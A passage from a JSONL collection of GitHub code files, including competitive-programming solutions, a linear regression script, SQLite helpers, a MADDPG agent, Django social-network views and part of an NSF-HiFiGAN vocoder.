1\r\n # print('+ ', end='')\r\n else:\r\n pass\r\n # print('_ ', end='')\r\n # print()\r\n return style, changed\r\n else: # No optimal solution was found.\r\n if status == solver.FEASIBLE:\r\n print('A potentially suboptimal solution was found.')\r\n else:\r\n print('The solver could not solve the problem.')\r\n\r\n\r\nif __name__ == '__main__':\r\n logging.basicConfig(level=logging.DEBUG,\r\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\r\n datefmt='%m-%d %H:%M',\r\n filename='logs/log-{}.log'.format(time.time()),\r\n filemode='w')\r\n console = logging.StreamHandler()\r\n console.setLevel(logging.INFO)\r\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\r\n console.setFormatter(formatter)\r\n logging.getLogger('').addHandler(console)\r\n\r\n total_elapsed_time = 0\r\n\r\n t = int(input())\r\n for test in range(1, t + 1):\r\n logging.info('Test #{}/{} started'.format(test, t))\r\n start_time = time.time()\r\n n, m = [int(s) for s in input().split(\" \")]\r\n\r\n board = [[] for x in range(n)]\r\n for x in range(n):\r\n board[x] = [None for _ in range(n)]\r\n\r\n for j in range(m):\r\n type, i, j = [s for s in input().split(\" \")]\r\n i = int(i) - 1\r\n j = int(j) - 1\r\n board[i][j] = type\r\n\r\n style, changed = solve_fashion(n, board, m)\r\n\r\n print(\"Case #{}: {} {}\".format(test, style, len(changed)))\r\n for c in changed:\r\n print(\"{} {} {}\".format(c[0], c[1] + 1, c[2] + 1))\r\n\r\n elapsed = time.time() - start_time\r\n total_elapsed_time += elapsed\r\n logging.info('Test #{}/{} ended. Time: {:.2f}'.format(test, t, elapsed))\r\n logging.info('Elapsed time: {:.2f}, Expected Total: {:.2f}'.format(\r\n total_elapsed_time,\r\n total_elapsed_time + (total_elapsed_time / test) * (t - test))\r\n )\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_202/87.py","file_name":"87.py","file_ext":"py","file_size_in_byte":5974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20368845616","text":"import sys\ninput=sys.stdin.readline\n\nN=int(input())\nnum_list=list(map(int,input().split())) #숫자의 배열을 리스트로 입력받는다.\nNGE=[-1]*N #오큰수가 없는 경우는 -1로 출력함으로 -1로 배열의 크기만큼 초기화 해둔다.\nstack=[] #인덱스를 저장할 스택을 만든다.\nfor i in range(N):\n while stack and num_list[stack[-1]] < num_list[i]: #스택이 비어있지 않거나 스택의 가장 윗번째 수가 i번째 수보다 작다면 지금까지 스택에 있던 수들의 오큰수는 i번째 수이다.\n NGE[stack.pop()]=num_list[i] #스택에 있는 수들의 오큰수는 모두 i번째 수가 된다.\n stack.append(i) #while문에 조건에 충족하지 않는다면 인덱스를 stack에 추가한다.\nprint(*NGE) #NGE를 출력한다. 
print(*list_name) prints the elements of the list separated by spaces.\n","repo_name":"Jeongmani/python-study","sub_path":"BOJ/Class 4/오큰수(17298).py","file_name":"오큰수(17298).py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12084089463","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport pylab as pl\nimport numpy as np\n\ndf = pd.read_csv('FuelConsumptionCo2.csv')\ncdf = df[['ENGINESIZE','CYLINDERS','FUELCONSUMPTION_COMB','CO2EMISSIONS']]\nprint(cdf.head())\n#viz = cdf[['CYLINDERS','ENGINESIZE','CO2EMISSIONS','FUELCONSUMPTION_COMB']]\n#print(viz.head())\n#viz.hist()\n#plt.show()\n\n\n'''plt.scatter(cdf.ENGINESIZE, cdf.CO2EMISSIONS,  color='blue')\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"Emission\")\nplt.show()'''\n\n# Step 1: create the train/test split\n# Create a random boolean mask (roughly 80% train, 20% test)\nmsk = np.random.rand(len(df))<0.8\n\ntrain=cdf[msk]\nprint(\"Size of train data: \",len(train))\ntest=cdf[~msk]\nprint(\"Size of test data: \",len(test))\n\n# Step 2: modeling\nfrom sklearn import linear_model\nregr = linear_model.LinearRegression()\nprint(\"Shape before convert: \",train[['ENGINESIZE']].shape,type(train[['ENGINESIZE']]))\ntrain_x = np.asanyarray(train[['ENGINESIZE']])\nprint(\"Shape after convert: \",train_x.shape,type(train_x))\ntrain_y = np.asanyarray(train[['CO2EMISSIONS']])\nregr.fit (train_x,train_y)\n\n# The coefficients: y_predict = theta_0 + theta_1 * x\nprint ('Coefficients: ', regr.coef_) #theta_1 (slope)\nprint ('Intercept: ',regr.intercept_)#theta_0 (intercept)\n\nplt.scatter(train.ENGINESIZE,train.CO2EMISSIONS,color=\"blue\")\nplt.plot(train_x,regr.intercept_[0]+regr.coef_[0][0]*train_x,'-r')\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"Emission\")\nplt.show()\n\n# Evaluation\nfrom sklearn.metrics import r2_score\n\ntest_x = np.asanyarray(test[['ENGINESIZE']])\ntest_y = np.asanyarray(test[['CO2EMISSIONS']])\ntest_y_predict = regr.predict(test_x)\n\nprint(\"Mean absolute error: %.2f\" % np.mean(np.absolute(test_y_predict - test_y)))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((test_y_predict - test_y) ** 2))\nprint(\"R2-score: %.2f\" % r2_score(test_y , test_y_predict))
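\n\n# --- Added sketch (not in the original script): an equivalent, reproducible split\n# can be obtained with scikit-learn instead of the random mask above:\n#   from sklearn.model_selection import train_test_split\n#   train, test = train_test_split(cdf, test_size=0.2, random_state=42)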
","repo_name":"ndtands/practiceAI","sub_path":"ML/Regression/simple-linear-regression.py","file_name":"simple-linear-regression.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5700477366","text":"# SW Expert Academy - Problem 10200. 구독자 전쟁 (Subscriber War)\n\nT = int(input())\n\nfor tc in range(1, T + 1):\n    N, A, B = map(int, input().split())\n    min_val, max_val = 987654321, 0\n    min_val = (A + B) - N # if A + B exceeds the total N, the surplus is the minimum number subscribed to both\n    if min_val < 0: # if the difference is negative, the minimum overlap is 0\n        min_val = 0\n    max_val = min(A, B)\n    print('#{} {} {}'.format(tc, max_val, min_val))\n","repo_name":"wnstj-yang/Algorithm","sub_path":"SWEA/D3/SWEA_10200.py","file_name":"SWEA_10200.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23414173221","text":"lineNumber = 0\ncards = []\nresult = []\nfor line in open(\"A-small-attempt0.in\"):\n\tlineNumber += 1\n\n\tif lineNumber == 1:\n\t\tcontinue\n\n\tif (lineNumber - 2) % 5 == 0:\n\t\tsecondChoice = int(line)\n\t\tcards = []\n\n\t\tif (lineNumber - 2) % 10 == 0:\n\t\t\tfirstChoice = int(line)\n\t\t\tsecondChoice = 0\n\n\t\tcontinue\n\n\t# wrap map in list so the rows can be read more than once under Python 3\n\tcards.append(list(map(lambda x: int(x.strip()), line.split(\" \"))))\n\tif len(cards) == 4:\n\t\tif secondChoice == 0:\n\t\t\tfirstChoiceCards = cards[firstChoice - 1]\n\t\telse:\n\t\t\tsecondChoiceCards = cards[secondChoice - 1]\n\t\t\tcommonCards = set(firstChoiceCards) & set(secondChoiceCards)\n\t\t\tprint(firstChoiceCards, secondChoiceCards, commonCards)\n\t\t\tif len(commonCards) == 1:\n\t\t\t\tresult.append(commonCards.pop())\n\t\t\telif len(commonCards) == 0:\n\t\t\t\tresult.append(\"Volunteer cheated!\")\n\t\t\telse:\n\t\t\t\tresult.append(\"Bad magician!\")\n\n\tprint(\"cards: %s\" % cards)\n\tprint(\"firstChoice: %s\" % firstChoice)\n\tprint(\"secondChoice: %s\" % secondChoice)\n\tprint(result)\n\noutput = open(\"output.txt\", \"w\")\nfor i in range(len(result)):\n\toutput.write(\"Case #%s: %s\\n\" % (i + 1, result[i]))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/2574.py","file_name":"2574.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2850234128","text":"import sqlite3\nfrom config import database\nimport os\nfrom shapely.geometry import Polygon\n\n\ndef commit_db(sql, args=()):\n    # create the database file on first use, then run a single write query\n    if not os.path.exists(database):\n        connection = sqlite3.connect(database)\n        connection.close()\n    connection = sqlite3.connect(database)\n    cursor = connection.cursor()\n    cursor.execute(sql, args)\n    connection.commit()\n    connection.close()\n    return\n\n\ndef query_db(query, args=()):\n    connection = sqlite3.connect(database)\n    cur = connection.cursor().execute(query, args)\n    return cur.fetchall()\n\n\ndef commit_many(sql, data):\n    connection = sqlite3.connect(database)\n    cursor = connection.cursor()\n    cursor.executemany(sql, data)\n    connection.commit()\n    connection.close()\n    return\n\n\ndef new_table(entity):\n    if entity == 'Nodes':\n        commit_db('DROP TABLE IF EXISTS Nodes')\n        commit_db('CREATE TABLE Nodes('\n                  'NodeID INTEGER PRIMARY KEY,'\n                  'Lat FLOAT,'\n                  'Lon FLOAT)')\n    elif entity == 'Weighted':\n        commit_db('DROP TABLE IF EXISTS Weighted')\n        commit_db('CREATE TABLE Weighted('\n                  'GridID INTEGER,'\n                  'GraphID INTEGER,'\n                  'Factor FLOAT);')\n    elif entity == 'Bounds':\n        commit_db('DROP TABLE IF EXISTS Bounds')\n        commit_db('CREATE TABLE Bounds('\n                  'Direction TEXT,'\n                  'Value FLOAT);')\n    elif entity == 'BoundsBuildings':\n        commit_db('DROP TABLE IF EXISTS BoundsBuildings')\n        commit_db('CREATE TABLE BoundsBuildings('\n                  'Polygon TEXT);')\n
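    # (Added usage sketch, not in the original module) the helpers above are meant\n    # to be used together; hypothetical sample values for illustration only:\n    #   new_table('Nodes')\n    #   commit_db('INSERT INTO Nodes VALUES (?, ?, ?)', (1, 48.137, 11.575))\n    #   print(query_db('SELECT * FROM Nodes'))\n    elif entity == 'Buildings':\n        commit_db('DROP TABLE IF EXISTS Buildings')\n        commit_db('CREATE TABLE 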
Buildings('\n 'Polygon TEXT,'\n 'Height FLOAT,'\n 'HeightGround FLOAT);')\n elif entity == 'Shadow':\n commit_db('DROP TABLE IF EXISTS Shadow')\n commit_db('CREATE TABLE Shadow('\n 'GridID INTEGER,'\n 'Polygon TEXT);')\n elif entity == 'Graph':\n commit_db('DROP TABLE IF EXISTS Graph')\n commit_db('CREATE TABLE Graph('\n 'GraphID INTEGER PRIMARY KEY,'\n 'FromID INTEGER,'\n 'ToID INTEGER,'\n 'Costs FLOAT);')\n elif entity == 'Grid':\n commit_db('DROP TABLE IF EXISTS Grid')\n commit_db('CREATE TABLE Grid('\n 'GridID INTEGER PRIMARY KEY,'\n 'Azimut FLOAT,'\n 'Elevation FLOAT);')\n elif entity == 'Date':\n commit_db('DROP TABLE IF EXISTS Date')\n commit_db('CREATE TABLE Date('\n 'DateID INTEGER PRIMARY KEY,'\n 'GridID INTEGER,'\n 'Day INTEGER,'\n 'Hour INTEGER,'\n 'Minute INTEGER,'\n 'Azimut FLOAT,'\n 'Elevation FLOAT);')\n return\n\n\ndef get_buildings():\n return query_db('SELECT * FROM Buildings')\n\n\ndef get_grid_info(grid_id):\n return query_db('SELECT Azimut, Elevation FROM Grid WHERE gridID = ?', [grid_id])[0]\n\n\ndef get_polygons(grid_id):\n polygons = []\n for row in query_db('SELECT Polygon FROM Shadow WHERE GridID = ?', [grid_id]):\n poly = Polygon([(float(coordinate.split(',')[0]), float(coordinate.split(',')[1]))\n for coordinate in row[0].split(';')])\n if poly.is_valid:\n polygons.append(poly)\n return polygons\n\n\ndef get_graph():\n nodes = {}\n for row in query_db('SELECT * FROM Nodes'):\n nodes[row[0]] = (row[1], row[2])\n return query_db('SELECT * FROM Graph'), nodes\n\n\ndef get_bounds_buildings():\n poly = query_db('SELECT Polygon FROM BoundsBuildings')[0][0]\n return [(float(coordinate.split(',')[0]), float(coordinate.split(',')[1])) for coordinate in poly.split(';')]\n","repo_name":"Fischerfredl/Schattenrouting-Parser","sub_path":"database/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28665523913","text":"#coding:utf-8\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport platform\n\n\ndef setup_mpl():\n fonts_dict = {\n \"Linux\": \"WenQuanYi Zen Hei\",\n \"Windows\": \"SimHei\",\n }\n # print(platform.platform())\n for system in [\"Linux\", \"Windows\"]:\n if system in platform.platform():\n matplotlib.rcParams['font.sans-serif'] = fonts_dict[system]\n matplotlib.rcParams['font.family'] = fonts_dict[system]\n matplotlib.rcParams['axes.unicode_minus'] = False\n break\n \n\nclass FundVisualizer:\n def __init__(self):\n setup_mpl() \n self.fig, self.axes = plt.subplots(nrows=2, ncols=1)\n\n def plot(self, fund, keys=['单位净值', '累计净值']):\n fund.data[keys].plot(ax=self.axes[0])\n fund.data['日增长率'].plot(ax=self.axes[1])\n plt.show() ","repo_name":"AutoRecursive/qianjinqiu","sub_path":"Fund/FundVisualizer.py","file_name":"FundVisualizer.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13131895636","text":"from maddpg.networks import ActorNetwork, CriticNetwork\nimport torch as T\nimport numpy as np\nfrom utils.noise import OUNoise\n\nclass NetworkedAgent: # An agent that is a part of a team\n def __init__(self, agent_list, n_actions, obs_len, name, n_agents, fc1_dims, fc2_dims, gamma, lr, chkpt_dir):\n self.agent_list = agent_list # List of all agents in the team\n self.n_actions = n_actions\n self.obs_len = obs_len\n self.name = name\n self.tau = 0.01\n self.gamma = gamma\n self.timestep = 0\n self.noise = 
OUNoise(self.n_actions) # Ornstein-Uhlenbeck noise\n\n # Networks\n self.actor = ActorNetwork(obs_len, n_actions, fc1_dims, fc2_dims, lr, chkpt_dir, f'actor_{name}')\n self.target_actor = ActorNetwork(obs_len, n_actions, fc1_dims, fc2_dims, lr, chkpt_dir, f'target_actor_{name}')\n self.critic = CriticNetwork(obs_len, n_actions, n_agents, fc1_dims, fc2_dims, lr, chkpt_dir, f'critic_{name}')\n self.target_critic = CriticNetwork(obs_len, n_actions, n_agents, fc1_dims, fc2_dims, lr, chkpt_dir, f'target_critic_{name}')\n\n self.update_network_parameters(tau=1)\n \n def choose_action(self, observation):\n # Choose an action based on the observation\n self.actor.eval()\n state = T.tensor(np.array([observation]), dtype=T.float).to(self.actor.device)\n actions = self.actor(state)\n actions += T.tensor(self.noise.noise(), dtype=T.float).to(self.actor.device) # Add noise\n actions = actions.clamp(-1, 1) # Ensure between -1 and 1\n self.actor.train()\n return actions.detach().cpu().numpy()\n\n def update_network_parameters(self, tau=None):\n # Update the target networks with tau\n if tau is None:\n tau = self.tau\n \n actor_params = self.actor.named_parameters()\n critic_params = self.critic.named_parameters()\n target_actor_params = self.target_actor.named_parameters()\n target_critic_params = self.target_critic.named_parameters()\n\n actor_state_dict = dict(actor_params)\n critic_state_dict = dict(critic_params)\n target_actor_state_dict = dict(target_actor_params)\n target_critic_state_dict = dict(target_critic_params)\n\n for name in actor_state_dict:\n actor_state_dict[name] = tau*actor_state_dict[name].clone() + (1-tau)*target_actor_state_dict[name].clone()\n\n for name in critic_state_dict:\n critic_state_dict[name] = tau*critic_state_dict[name].clone() + (1-tau)*target_critic_state_dict[name].clone()\n \n self.target_actor.load_state_dict(actor_state_dict)\n self.target_critic.load_state_dict(critic_state_dict)\n \n # Deal with noise\n def reset_noise(self):\n self.noise.reset()\n \n def scale_noise(self, scale):\n self.noise.scale = scale\n\n # Save and load models\n def save_models(self):\n self.actor.save_checkpoint()\n self.target_actor.save_checkpoint()\n self.critic.save_checkpoint()\n self.target_critic.save_checkpoint()\n\n def load_models(self):\n self.actor.load_checkpoint()\n self.target_actor.load_checkpoint()\n self.critic.load_checkpoint()\n self.target_critic.load_checkpoint()","repo_name":"WilliamFlinchbaugh/Deep-RL-Battlespace","sub_path":"maddpg/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15765432604","text":"import socket\nimport time\n\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef timer(clock=None):\n if clock is None:\n clock = time\n\n timer = dict(start=clock.time(), end=None, elapsed=None)\n try:\n yield timer\n finally:\n timer[\"end\"] = clock.time()\n timer[\"elapsed\"] = timer[\"end\"] - timer[\"start\"]\n\n\ndef findFreePort() -> int:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind((\"localhost\", 0)) # with port=0 the OS will find a random free port\n port = sock.getsockname()[1]\n sock.close()\n return 
port\n","repo_name":"APrioriInvestments/filesystem","sub_path":"tests/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33146509835","text":"num = input(\"Enter a number : \")\n\noriginalNum = int(num)\n\nn= len(num)\n\nsum = 0\n\nfor i in range(n):\n sum+=(int(num[i])**n)\n\nif sum==originalNum:\n print(\"Armstrong !\")\nelse:\n print(\"Not armstrong !\")\n","repo_name":"dkgohel/py-repo","sub_path":"armstrong/armstrong.py","file_name":"armstrong.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"15062193911","text":"from django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect\nfrom social.forms import UserForm, UserProfileForm, FeedbackForm, SearchForm, MessageForm, DoctorProfileForm, \\\n PatientProfileForm\nfrom social.models import UserProfile, Feedback, Message, MessageNotification\n\n\ndef home(request):\n if request.user.is_authenticated():\n return redirect(\"person\", person_id=request.user.id)\n return render(request, \"base.html\")\n\n\ndef register(request):\n if request.method == 'POST':\n uf = UserForm(request.POST, prefix='user')\n upf = UserProfileForm(request.POST, prefix='userprofile')\n if uf.is_valid() and upf.is_valid():\n user = uf.save(commit=False)\n user.set_password(uf.cleaned_data['password'])\n user.save()\n\n userprofile = upf.save(commit=False)\n userprofile.user = user\n if not userprofile.is_doctor and userprofile.doctor_type:\n userprofile.doctor_type = \"\"\n\n userprofile.save()\n\n login(request, authenticate(username=uf.cleaned_data['username'], password=uf.cleaned_data['password']))\n\n return redirect(\"home\")\n else:\n uf = UserForm(prefix='user')\n upf = UserProfileForm(prefix='userprofile')\n return render(request, 'registration/register.html', dict(userform=uf, userprofileform=upf))\n\n\ndef person(request, person_id, feedback_form=None):\n # print request.user.\n person = UserProfile.objects.get(user=person_id)\n if person.is_doctor:\n feedbacks = Feedback.objects.filter(estimated=person)\n else:\n feedbacks = Feedback.objects.filter(author=person)\n\n feedback_form = feedback_form or FeedbackForm()\n return render(request, \"person.html\", {\"person\": person, \"feedbacks\": feedbacks, \"form\": feedback_form})\n\ndef search(request):\n form = SearchForm(request.GET)\n if form.is_valid():\n persons = User.objects.filter(username__contains=form.cleaned_data.get(\"username\"))\n return render(request, \"search.html\", {'persons': persons})\n else:\n return redirect(\"home\")\n\n\ndef search_doctors(request):\n return render(request, \"search.html\", {'persons': User.objects.filter(userprofile__is_doctor=True)})\n\n\ndef search_patients(request):\n return render(request, \"search.html\", {'persons': User.objects.filter(userprofile__is_doctor=False)})\n\n\n@login_required\ndef messages(request, person_id):\n form = MessageForm(request.POST or None)\n to_person = UserProfile.objects.get(id=person_id)\n if request.method == 'POST':\n if form.is_valid():\n Message.objects.create(from_person=request.user.userprofile,\n to_person=to_person,\n text=form.cleaned_data['text'])\n if not 
MessageNotification.objects.filter(from_person=request.user.userprofile, to_person=to_person):\n MessageNotification.objects.create(from_person=request.user.userprofile, to_person=to_person)\n return redirect(\"messages\", person_id)\n else:\n messages = Message.objects.filter(Q(from_person=request.user.userprofile, to_person=person_id) |\n Q(from_person=person_id, to_person=request.user.userprofile))\n notification = MessageNotification.objects.filter(from_person=to_person, to_person=request.user.userprofile)\n if notification:\n notification.delete()\n return render(request, 'messages.html', {\"messages\": messages, \"send_form\": form})\n\n\n@login_required\ndef notifications(request):\n notification_set = MessageNotification.objects.filter(to_person=request.user.userprofile)\n return render(request, 'notifications.html', {\"notifications\": notification_set})\n\n\n@login_required\ndef send_feedback(request, person_id):\n if request.method == 'POST':\n feedback_form = FeedbackForm(request.POST)\n if feedback_form.is_valid():\n feedback = feedback_form.save(commit=False)\n feedback.author = request.user.userprofile\n feedback.estimated = UserProfile.objects.get(id=person_id)\n feedback.save()\n return redirect(\"person\", person_id=person_id)\n\n@login_required\ndef person_follow(request, person_id):\n request.user.userprofile.following.add(UserProfile.objects.get(user=person_id))\n return redirect(\"person\", person_id=person_id)\n\n@login_required\ndef person_unfollow(request, person_id):\n request.user.userprofile.following.remove(UserProfile.objects.get(user=person_id))\n return redirect(\"person\", person_id=person_id)\n\n@login_required\ndef editprofile(request):\n if request.user.userprofile.is_doctor:\n form = DoctorProfileForm(request.POST or None)\n else:\n form = PatientProfileForm(request.POST or None)\n\n if request.method == \"POST\":\n if form.is_valid():\n request.user.userprofile.aboutme = form.cleaned_data[\"aboutme\"]\n if request.user.userprofile.is_doctor:\n request.user.userprofile.qualification = form.cleaned_data[\"qualification\"]\n request.user.userprofile.education = form.cleaned_data[\"education\"]\n request.user.userprofile.workplace = form.cleaned_data[\"workplace\"]\n request.user.userprofile.save()\n return redirect(\"person\", request.user.id)\n\n return render(request, 'editprofile.html', {\"form\": form})\n","repo_name":"Cybran111/socialdoctor","sub_path":"social/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21661121620","text":"import os\nfrom typing import *\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Conv1d, ConvTranspose1d\nfrom torch.nn.utils import remove_weight_norm, weight_norm\nfrom torchaudio.transforms import Resample\n\nfrom latopia.config.nsf_hifigan import NsfHifiganConfig\nfrom latopia.torch_utils import get_padding, init_weights\n\nfrom .nv_stft import STFT\n\nLRELU_SLOPE = 0.1\n\n\nclass ResBlock1(torch.nn.Module):\n def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)):\n super(ResBlock1, self).__init__()\n self.h = h\n self.convs1 = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[0],\n padding=get_padding(kernel_size, dilation[0]),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[1],\n 
padding=get_padding(kernel_size, dilation[1]),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[2],\n padding=get_padding(kernel_size, dilation[2]),\n )\n ),\n ]\n )\n self.convs1.apply(init_weights)\n\n self.convs2 = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=1,\n padding=get_padding(kernel_size, 1),\n )\n ),\n ]\n )\n self.convs2.apply(init_weights)\n\n def forward(self, x):\n for c1, c2 in zip(self.convs1, self.convs2):\n xt = F.leaky_relu(x, LRELU_SLOPE)\n xt = c1(xt)\n xt = F.leaky_relu(xt, LRELU_SLOPE)\n xt = c2(xt)\n x = xt + x\n return x\n\n def remove_weight_norm(self):\n for l in self.convs1:\n remove_weight_norm(l)\n for l in self.convs2:\n remove_weight_norm(l)\n\n\nclass ResBlock2(torch.nn.Module):\n def __init__(self, h, channels, kernel_size=3, dilation=(1, 3)):\n super(ResBlock2, self).__init__()\n self.h = h\n self.convs = nn.ModuleList(\n [\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[0],\n padding=get_padding(kernel_size, dilation[0]),\n )\n ),\n weight_norm(\n Conv1d(\n channels,\n channels,\n kernel_size,\n 1,\n dilation=dilation[1],\n padding=get_padding(kernel_size, dilation[1]),\n )\n ),\n ]\n )\n self.convs.apply(init_weights)\n\n def forward(self, x):\n for c in self.convs:\n xt = F.leaky_relu(x, LRELU_SLOPE)\n xt = c(xt)\n x = xt + x\n return x\n\n def remove_weight_norm(self):\n for l in self.convs:\n remove_weight_norm(l)\n\n\nclass SineGen(torch.nn.Module):\n \"\"\"Definition of sine generator\n SineGen(samp_rate, harmonic_num = 0,\n sine_amp = 0.1, noise_std = 0.003,\n voiced_threshold = 0,\n flag_for_pulse=False)\n samp_rate: sampling rate in Hz\n harmonic_num: number of harmonic overtones (default 0)\n sine_amp: amplitude of sine-waveform (default 0.1)\n noise_std: std of Gaussian noise (default 0.003)\n voiced_threshold: F0 threshold for U/V classification (default 0)\n flag_for_pulse: this SineGen is used inside PulseGen (default False)\n Note: when flag_for_pulse is True, the first time step of a voiced\n segment is always sin(np.pi) or cos(0)\n \"\"\"\n\n def __init__(\n self,\n samp_rate,\n harmonic_num=0,\n sine_amp=0.1,\n noise_std=0.003,\n voiced_threshold=0,\n ):\n super(SineGen, self).__init__()\n self.sine_amp = sine_amp\n self.noise_std = noise_std\n self.harmonic_num = harmonic_num\n self.dim = self.harmonic_num + 1\n self.sampling_rate = samp_rate\n self.voiced_threshold = voiced_threshold\n\n def _f02uv(self, f0):\n # generate uv signal\n uv = torch.ones_like(f0)\n uv = uv * (f0 > self.voiced_threshold)\n return uv\n\n @torch.no_grad()\n def forward(self, f0, upp):\n \"\"\"sine_tensor, uv = forward(f0)\n input F0: tensor(batchsize=1, length, dim=1)\n f0 for unvoiced steps should be 0\n output sine_tensor: tensor(batchsize=1, length, dim)\n output uv: tensor(batchsize=1, length, 1)\n \"\"\"\n f0 = f0.unsqueeze(-1)\n fn = torch.multiply(\n f0, torch.arange(1, self.dim + 1, device=f0.device).reshape((1, 1, -1))\n )\n rad_values = (fn / self.sampling_rate) % 1 ### % 1 means the products over n_har cannot be optimized away in post-processing\n rand_ini = torch.rand(fn.shape[0], fn.shape[2], device=fn.device)\n rand_ini[:, 0] = 0\n rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini\n is_half = 
rad_values.dtype is not torch.float32\n tmp_over_one = torch.cumsum(\n rad_values.double(), 1\n ) # % 1 ##### taking % 1 here would mean the following cumsum could no longer be optimized\n if is_half:\n tmp_over_one = tmp_over_one.half()\n else:\n tmp_over_one = tmp_over_one.float()\n tmp_over_one *= upp\n tmp_over_one = F.interpolate(\n tmp_over_one.transpose(2, 1),\n scale_factor=upp,\n mode=\"linear\",\n align_corners=True,\n ).transpose(2, 1)\n rad_values = F.interpolate(\n rad_values.transpose(2, 1), scale_factor=upp, mode=\"nearest\"\n ).transpose(2, 1)\n tmp_over_one %= 1\n tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0\n cumsum_shift = torch.zeros_like(rad_values)\n cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0\n rad_values = rad_values.double()\n cumsum_shift = cumsum_shift.double()\n sine_waves = torch.sin(\n torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi\n )\n if is_half:\n sine_waves = sine_waves.half()\n else:\n sine_waves = sine_waves.float()\n sine_waves = sine_waves * self.sine_amp\n return sine_waves\n\n\nclass SourceModuleHnNSF(torch.nn.Module):\n \"\"\"SourceModule for hn-nsf\n SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1,\n add_noise_std=0.003, voiced_threshod=0)\n sampling_rate: sampling_rate in Hz\n harmonic_num: number of harmonic above F0 (default: 0)\n sine_amp: amplitude of sine source signal (default: 0.1)\n add_noise_std: std of additive Gaussian noise (default: 0.003)\n note that amplitude of noise in unvoiced is decided\n by sine_amp\n voiced_threshold: threshold to set U/V given F0 (default: 0)\n Sine_source, noise_source = SourceModuleHnNSF(F0_sampled)\n F0_sampled (batchsize, length, 1)\n Sine_source (batchsize, length, 1)\n noise_source (batchsize, length 1)\n uv (batchsize, length, 1)\n \"\"\"\n\n def __init__(\n self,\n sampling_rate,\n harmonic_num=0,\n sine_amp=0.1,\n add_noise_std=0.003,\n voiced_threshod=0,\n ):\n super(SourceModuleHnNSF, self).__init__()\n\n self.sine_amp = sine_amp\n self.noise_std = add_noise_std\n\n # to produce sine waveforms\n self.l_sin_gen = SineGen(\n sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod\n )\n\n # to merge source harmonics into a single excitation\n self.l_linear = torch.nn.Linear(harmonic_num + 1, 1)\n self.l_tanh = torch.nn.Tanh()\n\n def forward(self, x, upp):\n sine_wavs = self.l_sin_gen(x, upp)\n sine_merge = self.l_tanh(self.l_linear(sine_wavs))\n return sine_merge\n\n\nclass Generator(torch.nn.Module):\n def __init__(self, h: NsfHifiganConfig):\n super(Generator, self).__init__()\n self.h = h\n self.num_kernels = len(h.resblock_kernel_sizes)\n self.num_upsamples = len(h.upsample_rates)\n self.m_source = SourceModuleHnNSF(sampling_rate=h.sampling_rate, harmonic_num=8)\n self.noise_convs = nn.ModuleList()\n self.conv_pre = 